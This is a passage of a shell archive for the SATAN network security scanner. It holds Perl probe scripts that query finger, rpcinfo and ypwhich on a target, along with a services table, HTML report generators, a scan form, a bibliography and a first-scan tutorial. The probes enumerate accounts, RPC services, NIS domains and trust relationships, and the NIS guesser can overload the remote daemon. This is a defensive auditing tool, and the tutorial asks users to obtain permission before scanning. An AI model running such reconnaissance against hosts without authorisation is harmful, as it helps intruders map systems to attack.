END_OF_FILE
if test 2279 -ne `wc -c <'satan-1.1.1/README'`; then
echo shar: \"'satan-1.1.1/README'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/README'
fi
if test -f 'satan-1.1.1/bin/finger.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/finger.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/finger.satan'\" $2332 characters$
sed "s/^X//" >'satan-1.1.1/bin/finger.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# version 2, Mon Mar 20 21:30:24 1995, last mod by wietse
X#
X
X# Query the target's finger daemon and report which user logged in from
X# which host. Try to clean up unqualified host names or host names that
X# may be truncated.

X
X$running_under_satan = 1;
X

Xrequire 'config/paths.pl';
Xrequire 'perl/fix_hostname.pl';

Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X
X#

X# Parse JCL.
X#
X$usage="Usage: $0 [-u user] [user@]target\n";
X$opt_u = ":0:\@:root:demo:guest";
X&Getopts("u:v");

X
Xif ($#ARGV < 0) {
X print STDERR $usage;
X exit 1;
X}
X

X# If no user is given, iterate over a list of queries that might
X# give us some interesting answers.
X
Xif ($ARGV[0] =~ /([^@]+)@([^@]+)/) {
X $login = $1;
X $target = $2;
X} else {
X $target = $ARGV[0];
X $login = $opt_u;
X}
X
X$| = 1;

X$service = &basename($0, ".satan");

X$severity = "l";
X
Xforeach $user (split(/:/, $login)) {
X print "trying: $SAFE_FINGER -l $user\@$target\n" if $opt_v;
X open (FINGER, "$SAFE_FINGER -l $user\@$target 2>/dev/null|")
X || exit 1;
X while (<FINGER>) {
X print if $opt_v;
X if (/^ login name: (\S+)/i) {
X $user = $1;
X }
X if (/^ login: (\S+)/i) {
X $user = $1;
X }
X if (/^ directory: (\S+)/i) {
X $home = $1;
X }
X if (/(on since|last login).*\s+from\s+(\S+)/i) {
X # Get rid of sync, daemon, localhost, X displays
X next if ($user eq "sync" || $user eq "daemon");
X $origin = $2;
X $origin =~ s/:.*//;
X # Strip off X display numbers.
X if ($origin =~ /(.*)@(.*)/) {
X ($ruser = $1) || ($ruser = "root");
X $host = $2;
X } else {
X $ruser = "root";
X $host = $origin;
X }
X next if ($host eq "" || $host eq "localhost");
X if ($fqdn = &fix_hostname($host, $target)) {

X $host = $fqdn;
X $status = "a";

X $trustee = "$user\@$target";
X $trusted = "$ruser\@$host";
X $text = "login $user home $home from $host"
X } else {
X $status = "u";
X $trustee = "$user\@$target";
X $trusted = "$user\@$host";
X $text = "login $user home $home from $host, unable to verify hostname";
X }
X $service_output = "$user $home $host";
X &satan_print();
X } elsif (/^ (never logged in|on since|last login)/i) {
X $status = "a";
X $trustee = $trusted = "";
X $text = "login $user home $home";
X $service_output = "$user $home";
X &satan_print();
X }
X }
X close(FINGER);
X}
END_OF_FILE
if test 2332 -ne `wc -c <'satan-1.1.1/bin/finger.satan'`; then
echo shar: \"'satan-1.1.1/bin/finger.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/finger.satan'
# end of 'satan-1.1.1/bin/finger.satan'
fi
if test -f 'satan-1.1.1/bin/rpc.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/rpc.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/rpc.satan'\" $2196 characters$
sed "s/^X//" >'satan-1.1.1/bin/rpc.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X#
X# Does an "rpcinfo -p" on a machine, tries to determine anything interesting
X# running there.
X#
X# TODO -- verify args
X#
X# version 1, Mon Mar 20 21:05:44 1995, last mod by wietse
X#
Xrequire 'config/paths.pl';
Xrequire 'perl/misc.pl';
X
Xdie "usage: $0 target" unless ($#ARGV == 0);
X
X# fields for satan...
X$severity="x";
X$status="a";

X
X$target = $ARGV[0];
X

Xopen(RPC, "$RPCINFO -p $target|");
X
Xwhile (<RPC>) {
X chop;
X ($prog, $vers, $proto, $port, $name) = split;
X if ($name eq "rexd" || $prog == 100017) { $rexd = 1; }
X if ($name eq "arm") { $arm = 1; }
X if ($name eq "bootparam" || $prog == 100026) { $bootparamd = 1; }
X if ($name eq "ypserv" || $prog == 100004) { $ypserv = 1; }
X if ($name eq "ypbind" || $prog == 100007) { $ypbind = 1; }
X if ($name eq "selection_svc" || $prog == 100015){ $s_svc = 1; }
X if ($name eq "nfs" || $prog == 100003) { $nfs = 1; }
X if ($name eq "mountd" || $prog == 100005) { $mountd = 1; }
X if ($name eq "rusersd" || $prog == 100002) { $rusersd = 1; }
X if ($name eq "netinfobind" || $prog == 200100001){ $netinfobind = 1; }
X if ($name eq "admind" || $prog == 100087) { $admind = 1; }
X}
Xclose(RPC);
X
Xif ($rexd) {
X $service = "rexd"; $text = "runs rexd"; &satan_print;
X}
Xif ($arm) {
X $service = "arm"; $text = "runs arm"; &satan_print;
X}
Xif ($bootparamd) {
X $service = "bootparam"; $text = "runs bootparam"; &satan_print;
X}
Xif ($ypserv) {
X $service = "ypserv"; $text = "is a NIS server"; &satan_print;
X}
Xif ($ypbind) {
X $service = "ypbind"; $text = "is a NIS client"; &satan_print;
X}
Xif ($rusersd) {
X $service = "rusersd"; $text = "runs rusersd"; &satan_print;
X}
Xif ($nfs) {
X $service = "nfs"; $text = "runs NFS"; &satan_print;
X}
Xif ($mountd) {
X $service = "mountd"; $text = "runs NFS"; &satan_print;
X}
Xif ($s_svc) {
X $service = "selection_svc"; $text = "runs selection_svc"; &satan_print;
X}
Xif ($admind) {
X $service = "admind"; $text = "runs admind"; &satan_print;

X}
X
X# print something out if nothing has happened so far...

X# if rpcinfo returns !0, then flag it; else, nothing interesting showed up.
Xif ($text eq "") {
X $severity="";
X if ($?) { $text="rpcinfo error #$?"; }
X else { $text="No rpcinfo output of interest"; }
X &satan_print();
X}
END_OF_FILE
if test 2196 -ne `wc -c <'satan-1.1.1/bin/rpc.satan'`; then
echo shar: \"'satan-1.1.1/bin/rpc.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/rpc.satan'
# end of 'satan-1.1.1/bin/rpc.satan'
fi
if test -f 'satan-1.1.1/bin/ypbind.satan' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/bin/ypbind.satan'\"
else
echo shar: Extracting \"'satan-1.1.1/bin/ypbind.satan'\" $1861 characters$
sed "s/^X//" >'satan-1.1.1/bin/ypbind.satan' <<'END_OF_FILE'
X#!/usr/local/bin/perl5
X
X# Try to identify a host's NIS domain name and NIS server by trying out a
X# series of NIS domain name guesses. When the number of guesses becomes
X# sufficiently large (say, several tens when the network is fast) the
X# remote ypbind daemon may fall behind so far that it runs out of file
X# descriptors. This can be fixed by inserting sleep() calls.

X
X$running_under_satan = 1;
X

Xrequire 'config/paths.pl';
Xrequire 'perl/fix_hostname.pl';

Xrequire 'perl/misc.pl';
Xrequire 'perllib/getopts.pl';
X
X#

X# Do JCL stuff.
X#
X$usage="Usage: $0 target [hints]\n";
X&Getopts("d:v");

X
Xif ($#ARGV < 0) {
X print STDERR $usage;
X exit 1;
X}
X$target = $ARGV[0];
X$service = &basename($0, ".satan");

X$status = "a";
X
X# Iterate over all hints. For each hint, try the hint itself, then all
X# results from breaking it up at successive dots. We use an associative
X# array to weed out duplicate guesses.
X#
Xif ($opt_d) {
X $guesses{$opt_d} = 0;
X} else {
X foreach $i (1..$#ARGV, 0) {
X $hint = $ARGV[$i];
X $guesses{$hint} = 0;
X for ($dot = rindex($hint,"."); $dot >= $[; $dot = rindex($head,".")) {
X $head = substr($hint, $[, $dot - $[);
X $guesses{$head} = 0;
X $tail = substr($hint, $dot + 1);
X $guesses{$tail} = 0;
X }
X }
X}
X
Xforeach $guess (keys %guesses) {
X if (defined($opt_v)) {
X print STDERR "ypbind.satan: trying: $guess\n";
X }
X open (YPWHICH, "$YPWHICH -d $guess $target 2>/dev/null|")
X || exit 1;
X while (<YPWHICH>) {
X chop;
X $nis_server = &fix_hostname(&get_host_name($_), $target);
X $severity = "x";
X $trusted = "root\@$nis_server";
X $trustee = "root\@$target";
X $service_output = "$guess $nis_server";
X $text = "$nis_server serves nis domain $guess for $target";
X &satan_print();
X exit;
X }
X close (YPWHICH);
X}
X
X# All out guesses failed.
X
X$text = "unable to guess nis domain name of $target";
X&satan_print();
Xexit;
END_OF_FILE
if test 1861 -ne `wc -c <'satan-1.1.1/bin/ypbind.satan'`; then
echo shar: \"'satan-1.1.1/bin/ypbind.satan'\" unpacked with wrong size!
fi
chmod +x 'satan-1.1.1/bin/ypbind.satan'
# end of 'satan-1.1.1/bin/ypbind.satan'
fi
if test -f 'satan-1.1.1/config/services' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/config/services'\"
else
echo shar: Extracting \"'satan-1.1.1/config/services'\" $2337 characters$
sed "s/^X//" >'satan-1.1.1/config/services' <<'END_OF_FILE'
X
Xtcpmux 1/tcp # rfc-1078
Xecho 7/tcp
Xecho 7/udp
Xdiscard 9/tcp sink null
Xdiscard 9/udp sink null
Xsystat 11/tcp users
Xdaytime 13/tcp
Xdaytime 13/udp
Xnetstat 15/tcp
Xchargen 19/tcp ttytst source
Xchargen 19/udp ttytst source
Xftp-data 20/tcp
Xfsp 21/udp
Xftp 21/tcp
Xtelnet 23/tcp
Xsmtp 25/tcp mail
Xtime 37/tcp timserver
Xtime 37/udp timserver
Xname 42/udp nameserver
Xwhois 43/tcp nicname # usually to sri-nic
Xdomain 53/tcp
Xdomain 53/udp
Xtftp 69/udp
Xgopher 70/tcp
Xrje 77/tcp
Xfinger 79/tcp
Xhttp 80/tcp
Xlink 87/tcp ttylink
Xsupdup 95/tcp
Xhostnames 101/tcp hostname # usually to sri-nic
Xiso-tsap 102/tcp
Xx400 103/tcp # ISO Mail
Xx400-snd 104/tcp
Xcsnet-ns 105/tcp
Xpop-2 109/tcp # Post Office
Xsunrpc 111/tcp
Xsunrpc 111/udp
Xauth 113/tcp # RFC931 identity protocol
Xsftp 115/tcp
Xuucp-path 117/tcp
Xnntp 119/tcp usenet # Network News Transfer
Xntp 123/tcp # Network Time Protocol
Xnetbios-ns 137/tcp NETBIOS Name Service
Xnetbios-ns 137/udp NETBIOS Name Service
Xnetbios-dgm 138/tcp NETBIOS Datagram Service
Xnetbios-dgm 138/udp NETBIOS Datagram Service
Xnetbios-ssn 139/tcp NETBIOS Session Service
Xnetbios-ssn 139/udp NETBIOS Session Service
Ximap2 143/tcp
XNeWS 144/tcp news # Window System
Xsnmp 161/udp
Xsnmp-trap 162/udp snmptrap
Xxdmcp 177/udp
Xbiff 512/udp comsat
Xexec 512/tcp
Xlogin 513/tcp
Xwho 513/udp whod
Xshell 514/tcp cmd # no passwords used
Xsyslog 514/udp
Xprinter 515/tcp spooler # line printer spooler
Xtalk 517/udp
Xntalk 518/udp
Xroute 520/udp router routed
Xcourier 530/tcp rpc # experimental
Xuucp 540/tcp uucpd # uucp daemon
Xklogin 543/tcp # Kerberos rlogin
Xkshell 544/tcp krcmd # Kerberos remote shell
Xnew-rwho 550/udp new-who # experimental
Xrmonitor 560/udp rmonitord # experimental
Xmonitor 561/udp # experimental
Xpcserver 600/tcp # ECD Integrated PC board srvr
Xkerberos 750/tcp kdc # Kerberos (server) tcp
Xkerberos 750/udp kdc # Kerberos (server) udp
Xkrbupdate 760/tcp kreg # Kerberos registration
Xkpasswd 761/tcp kpwd # Kerberos "passwd"
Xingreslock 1524/tcp
Xeklogin 2105/tcp # Kerberos encrypted rlogin
END_OF_FILE
if test 2337 -ne `wc -c <'satan-1.1.1/config/services'`; then
echo shar: \"'satan-1.1.1/config/services'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/config/services'
fi
if test -f 'satan-1.1.1/html/docs/references.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/references.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/references.html'\" $1765 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/references.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN References/Bibliography</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H2>Bibliography</H2>
X<HR>
X<P>
XBaldwin, Robert W.,
X<CITE> Rule Based Analysis of Computer Security</CITE>,

XMassachusetts Institute of Technology, June 1987.

X<P>
XBellovin, Steve,
X<CITE> Using the Domain Name System for System Break-ins</CITE>,
X1992 (unpublished).
X<P>
XFarmer, Dan, and Venema, Wietse,
X<A HREF="admin_guide_to_cracking.html">
X<CITE> Improving the Security of Your Site by Breaking Into it</CITE></A>,
Xcomp.security.unix, December 1993.
X<P>
XMassachusetts Institute of Technology,
X<CITE> X Window System Protocol</CITE>,
XVersion 11, 1990.
X<P>
XShimomura, Tsutomu,
X<CITE> private communication</CITE>.
X<P>
XSun Microsystems,
X<CITE> OpenWindows V3.0.1 User Commands</CITE>,
XMarch 1992.
X<P>
XBellovin, Steve,
X<CITE> Security Problems in the TCP/IP Protocol Suite</CITE>,

XComputer Communication Review 19 (2), 1989; a comment by Stephen
XKent appears in volume 19 (3), 1989.

X<P>

XGarfinkel, Simson and Spafford, Gene,

X<CITE> Practical UNIX Security</CITE>,

XO'Reilly and Associates, Inc., 1992.

X<P>

XHess, David, Safford, David, and Pooch, Udo,

X<CITE> A UNIX Network Protocol Study: Network Information Service</CITE>,
XComputer Communication Review 22 (5) 1992.
X<P>
XPhreak Accident,
X<CITE> Playing Hide and Seek, UNIX style</CITE>,
XPhrack, Volume Four, Issue Forty-Three, File 14 of 27.
X<P>
XRanum, Marcus,
X<CITE> Firewalls internet electronic mailing list</CITE>,
XSept 1993.
X<P>
XSchuba, Christoph,
X<CITE> Addressing Weaknesses in the Domain Name System Protocol</CITE>,
XPurdue University, August 1993.
X<P>
XThompson, Ken,
X<CITE> Reflections on Trusting Trust</CITE>,
XCommunications of the ACM
X27 (8), 1984.

X</BODY>
X</HTML>
END_OF_FILE

if test 1765 -ne `wc -c <'satan-1.1.1/html/docs/references.html'`; then
echo shar: \"'satan-1.1.1/html/docs/references.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/references.html'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_OS.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_OS.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_OS.pl'\" $1787 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_OS.pl' <<'END_OF_FILE'
X#
X# Report all operating system classes. On the fly evaluate the number of
X# hosts per class, per operating system version and related statistics.
X#
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Tables - by System Type </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - by System Type </H1>
X<hr>
X<h3>Number of hosts per system type (vulnerable/total).</h3>
X<ul>
XEOF
X
X&make_hosttype_info() ;
X
Xfor (sort keys %systypes_by_class) {
X # Mask possible blanks in the system class names.
X ($_class = $_) =~ tr / \//?!/;
X $sysclass_severities{$_class} = 0
X unless defined($sysclass_severities{$_class});
X $_dot = $sysclass_severities{$_} ? "reddot" : "blackdot";
X $_alt = $sysclass_severities{$_} ? "*" : "-";
X print CLIENT <<EOF

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">

X <a href="satan_info_OSclass.pl,$_class,"> $_</a>
X ($sysclass_severities{$_}/$sysclass_counts{$_})
XEOF
X unless /other/;
X}
Xif (sizeof(*hosttype) > 0) {
X $_class = "other";
X $sysclass_severities{$_class} = 0
X unless defined($sysclass_severities{$_class});
X $_dot = $sysclass_severities{$_class} ? "reddot" : "blackdot";
X $_alt = $sysclass_severities{$_class} ? "*" : "-";
X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">

X <a href="satan_info_OSclass.pl,other,"> Other/unknown</a>
X ($sysclass_severities{$_class}/$sysclass_counts{$_class})
X </ul>
X <HL><strong>System types with a red dot next to them have a vulnerable host contained within.</strong>

XEOF
X} else {
X print CLIENT <<EOF;

X </ul>
X No system type information available.

XEOF
X}
X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |

X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE
if test 1787 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_OS.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_OS.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_OS.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_class.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_class.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_class.pl'\" $2193 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_class.pl' <<'END_OF_FILE'
X#
X# Report services and host counts.
X#
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Host Tables - by Class of Service </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - by Class of Service </H1>
X<hr>
XEOF
X
X&make_service_info() ;
X
Xif (sizeof(*servers) > 0) {
X print CLIENT "<p> <h3> Number of server systems (vulnerable/total) </h3> <ul>\n";
X for (sort keys %servers) {
X # Mask possible blanks or slashes in service names.

X ($_service = $_) =~ tr / \//?!/;

X $_dot = $server_severities{$_} ? "reddot" : "blackdot";
X $_alt = $server_severities{$_} ? "*" : "-";
X if ($server_counts{$_} > 0) {
X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">

X <a href="satan_info_servers.pl,$_service,"> $_</a>
X ($server_severities{$_}/$server_counts{$_})
XEOF
X# } else {
X# print CLIENT <<EOF;
X# <dt><IMG SRC=$HTML_ROOT/dots/blackdot.gif ALT="-"> $_
X#EOF
X }
X }
X print CLIENT "</ul>\n";
X}
X
Xif (sizeof(*clients) > 0) {
X print CLIENT "<p> <h3> Number of client systems (vulnerable/total) </h3> <ul>\n";
X for (sort keys %clients) {
X # Mask possible blanks or slashes in service names.

X ($_service = $_) =~ tr / \//?!/;

X $_dot = $client_severities{$_} ? "reddot" : "blackdot";
X $_alt = $client_severities{$_} ? "*" : "-";
X if ($client_counts{$_} > 0) {
X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">

X <a href="satan_info_clients.pl,$_service,"> $_</a>
X ($client_severities{$_}/$client_counts{$_})
XEOF
X# } else {
X# print CLIENT <<EOF;
X# <dt><IMG SRC=$HTML_ROOT/dots/blackdot.gif ALT="-"> $_
X#EOF
X }
X }
X print CLIENT "</ul>\n";
X}
X
Xif (sizeof(*servers) > 0 || sizeof(*clients) > 0) {
X print CLIENT <<EOF;
X <strong>Note: hosts may appear in multiple categories. </strong>
X <HL>
X <strong>Service types with a red dot next to them have a vulnerable host contained within</strong>

XEOF
X} else {
X print CLIENT <<EOF;

X No service information found.
XEOF
X}
X

Xprint CLIENT <<EOF
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |

X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE
if test 2193 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_class.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_class.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_class.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_trusting.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_trusting.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_trusting.pl'\" $1011 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_trusting.pl' <<'END_OF_FILE'
X#
X# Report which hosts are trusting how many times
X#
Xsub sort_numerically {
X $total_trusted_count{$b} <=> $total_trusted_count{$a};

X}
X
Xprint CLIENT <<EOF;

X<HTML>
X<HEAD>
X<title> Trust - Trusting Hosts</title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - Trusting Hosts</H1>
X<hr>
X<h3>Trusting hosts (by number of trusted hosts).</h3>
X<ul>
XEOF
X
X&make_severity_info();
X
Xfor (sort sort_numerically keys %total_trusted_count) {
X $_dot = exists($severity_host_type_info{$_}) ? "reddot" : "blackdot";
X $_alt = exists($severity_host_type_info{$_}) ? "*" : "-";
X print CLIENT <<EOF;

X <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt">

X <A HREF="satan_info_host.pl,$_,">$_</A> -
X <A HREF="satan_results_trusted.pl,$_,trusted_type,"> $total_trusted_count{$_} host(s)</A>

XEOF
X}
X
Xprint CLIENT <<EOF;

X</ul>

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |

X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE
if test 1011 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_trusting.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_trusting.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_trusting.pl'
fi
if test -f 'satan-1.1.1/html/running/satan_run_action.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/running/satan_run_action.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/running/satan_run_action.pl'\" $1768 characters$
sed "s/^X//" >'satan-1.1.1/html/running/satan_run_action.pl' <<'END_OF_FILE'
X#
X# Collect data and keep the user informed.
X#
X
X#
X# Make sure they specified a host at all.
X#
Xif ($primary_target eq "") {
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>Error - Missing input </TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1>
X<hr>
XNo primary host or network was specified.

X</BODY>
X</HTML>
XEOF

X;
X die "\n";
X}
X
X#
X# If a host name was specified look up the official name.
X#
Xif ($primary_target !~ /^\d+\./) {
X $tmp_target = &getfqdn(&get_host_name(&get_host_addr($primary_target)));
X if ($tmp_target eq "") {
X print CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>Error - Unknown host</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Unknown host</H1>
X<hr>
XUnable to look up host <TT> $primary_target </TT>

X</BODY>
X</HTML>
XEOF

X;
X die "\n";
X }
X $primary_target = $tmp_target;
X}
X
X#
X# Primary target is OK, start data collection.
X#
Xprint CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>SATAN data collection </TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN data collection</H1>
X<hr>
X<B>Data collection in progress...</B>
X
X<P>
X
XEOF
X;
X
X$_live_hosts = $live_hosts;
X
X&run_satan($primary_target);
X
X$_live_hosts = $live_hosts - $_live_hosts;
X
Xprint CLIENT <<EOF;
X<P>
X
X<B>Data collection completed ($_live_hosts host(s) visited).</B>
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=../reporting/analysis.pl>Continue with report and analysis</a>
XEOF
X
Xif (&getfqdn($tmp_target)) {
X print CLIENT <<EOF;
X| <a href="../reporting/satan_info_host.pl,$tmp_target,">
XView primary target results</a>
XEOF
X}
Xprint CLIENT <<EOF

X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1768 -ne `wc -c <'satan-1.1.1/html/running/satan_run_action.pl'`; then
echo shar: \"'satan-1.1.1/html/running/satan_run_action.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/running/satan_run_action.pl'
fi
if test -f 'satan-1.1.1/html/running/satan_run_form.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/running/satan_run_form.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/running/satan_run_form.pl'\" $1881 characters$
sed "s/^X//" >'satan-1.1.1/html/running/satan_run_form.pl' <<'END_OF_FILE'
X#
X# Display a FORM to select the primary target and to give the user a chance to
X# override some defaults.

X#
X($_host) = split(/,/, $html_script_args);

X
X#
X# First figure out what radio buttons etc. should be "on". Note: the
X# variables below are global. Perhaps we should hide in our own package
X# name space.
X#

X@check_subnets = (); $check_subnets[$attack_proximate_subnets] = "checked";
X@check_level = (); $check_level[$attack_level] = "checked";
X
X#
X# In case the primary target has not yet been set.
X#
X$primary_target = $THIS_HOST unless $primary_target;
X$_host = $primary_target unless $_host;
X
Xprint CLIENT <<EOF
X<HTML>
X<HEAD>
X<TITLE>SATAN target selection</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">

X</HEAD>
X<BODY>
X

X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN target selection</H1>
X
X<hr>
X
X<FORM METHOD=POST ACTION="satan_run_action.pl">
X
X<h3> Primary target selection </h3>
X
XPrimary target host or network, e.g. <tt>$THIS_HOST</tt>:
X<INPUT SIZE="48" NAME="primary_target" Value="$_host">
X
X<P>
X
X<DL compact>
X<DT><DD><input type=radio name="attack_proximate_subnets" value="0" $check_subnets[0]>
X Scan the target host only.
X<DT><DD><input type=radio name="attack_proximate_subnets" value="1" $check_subnets[1]>
X Scan all hosts in the primary (i.e. the target's) subnet.
X</DL>
X
X<HR>
X
X<h3> Scanning level selection </h3>
X
XShould SATAN do a light scan, a normal scan, or should it hit the
X(primary) target(s) at full blast?
X
X<P>
X
X<DL compact>
X<DT><DD><input type=radio name="attack_level" value="0" $check_level[0]>
X Light
X<DT><DD><input type=radio name="attack_level" value="1" $check_level[1]>
X Normal (may be detected even with minimal logging)
X<DT><DD><input type=radio name="attack_level" value="2" $check_level[2]>
X Heavy (error messages may appear on systems consoles)
X</DL>
X
X<HR>
X
X<INPUT TYPE="submit" VALUE=" Start the scan ">
X
X</FORM>

X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 1881 -ne `wc -c <'satan-1.1.1/html/running/satan_run_form.pl'`; then
echo shar: \"'satan-1.1.1/html/running/satan_run_form.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/running/satan_run_form.pl'
fi
if test -f 'satan-1.1.1/html/tutorials/first_time/scanning.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/first_time/scanning.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/first_time/scanning.html'\" $1743 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/first_time/scanning.html' <<'END_OF_FILE'
X<title>Scanning for the first time with SATAN</title>
X<H1><IMG SRC="../../images/satan.gif"> Scanning for the first time with SATAN</H1>
X<HR>
X<p>
XTo "scan", in SATAN-ese, means to probe or test a remote host's security.
XSATAN has the ability to scan a great number of hosts on a network;
Xfortunately or unfortunately, you may not have the authority or permission
Xto scan all of the hosts. SATAN should never be used to scan hosts that
Xyou haven't gotten explicit permission from the owner of the host that
Xit is permissible to scan it.

X<p>
X<STRONG> Remember - you should run SATAN as "root"!</STRONG>
X<p>

XAssuming that you have the authority to do so, it is very simple to start
Xscanning:
X<p>
X<OL>
X<li> From the control panel in the HTML interface, select
X <I>Run SATAN</I>. It will prompt you with
X <I>Primary target selection</I>; type in the host that you're
X running SATAN from if it already isn't in the prompt box.
X<li> Select <I>Scan the target host only</I>, or, if you would prefer
X and have the authorization and the time (it can take several minutes
X to scan a single host at the higher scan levels), select
X <I>Scan all hosts in the primary (i.e. the target's) subnet</I>.
X<li> Select a <I>Normal</I> scan to start out with. The more intensive
X the scan the more time it takes to complete.
X<li> Select <I>Start the scan</I> to commence the scanning.
X</OL>
X<p>
XThat's it! If you have any problems (remember, SATAN is currently only
Xsupported on SunOS 4.x and IRIX 5.x), you should read the full
Xdocumentation on <A HREF="../../docs/getting_started.html">
Xusing SATAN for the first time.</a>
X<p>
XYou should now go to <A HREF="analyzing.html"> Analyzing the output</A>
Xto see how to get and to interpret the results of your scan.
END_OF_FILE
if test 1743 -ne `wc -c <'satan-1.1.1/html/tutorials/first_time/scanning.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/first_time/scanning.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/first_time/scanning.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html'\" $1609 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/FTP_vulnerabilities.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - WU-FTPD Vulnerability</TITLE>

